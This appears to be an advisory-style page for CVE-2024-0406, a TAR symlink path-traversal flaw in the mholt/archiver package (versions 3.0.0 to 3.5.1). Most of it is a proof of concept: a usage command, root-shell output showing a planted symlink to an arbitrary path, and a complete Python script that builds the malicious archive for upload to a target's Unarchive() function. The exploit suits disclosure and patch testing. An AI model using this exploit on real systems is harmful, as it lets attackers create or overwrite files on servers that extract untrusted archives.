mholt/archiver — CVE-2024-0406
A vulnerability was discovered in the mholt/archiver package. This flaw enables attackers to craft specially designed TAR files that, when extracted, may grant access to restricted files or directories. The issue permits creation or overwriting of files using the library's privileges.
Affected versions: >=3.0.0 <= 3.5.1
Proof of Concept
Command Example
N/ABASH
» python3 cve-2024-0406.py /tmp/sessions/admin/fake_session
TAR file created at cve-2024-0406.tar with symlink pointing to /tmp/sessions/admin/fake_sessionAfter uploading to a target using the Unarchive() function:
N/ABASH
root@5af68317d6cb:/app/unarchive/admin# ls -al
total 8
drwxr-xr-x 2 root root 4096 Jun 1 08:20 .
drwxr-xr-x 3 root root 4096 Jun 1 07:02 ..
lrwxrwxrwx 1 root root 32 Jun 1 08:20 x -> /tmp/sessions/admin/fake_session
root@5af68317d6cb:/app/unarchive/admin# cat /tmp/sessions/admin/fake_session
<some-file-content-here>Python Exploit Script
N/APYTHON
import tarfile
import sys
import io
def create_tar(tar_path, symlink_target):
with tarfile.open(tar_path, 'w') as tar:
# Create a symlink entry './x' pointing to symlink_target
symlink_info = tarfile.TarInfo(name='./x')
symlink_info.type = tarfile.SYMTYPE
symlink_info.linkname = symlink_target
tar.addfile(symlink_info)
# Optional: Add a file with the same name 'x'
payload_content = b'<some-file-content-here>'
payload_info = tarfile.TarInfo(name='x')
payload_info.size = len(payload_content)
tar.addfile(payload_info, io.BytesIO(payload_content))
if __name__ == "__main__":
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <path_to_symlink>")
sys.exit(1)
symlink_target = sys.argv[1]
tar_path = "cve-2024-0406.tar"
create_tar(tar_path, symlink_target)
print(f"TAR file created at {tar_path} with symlink pointing to {symlink_target}")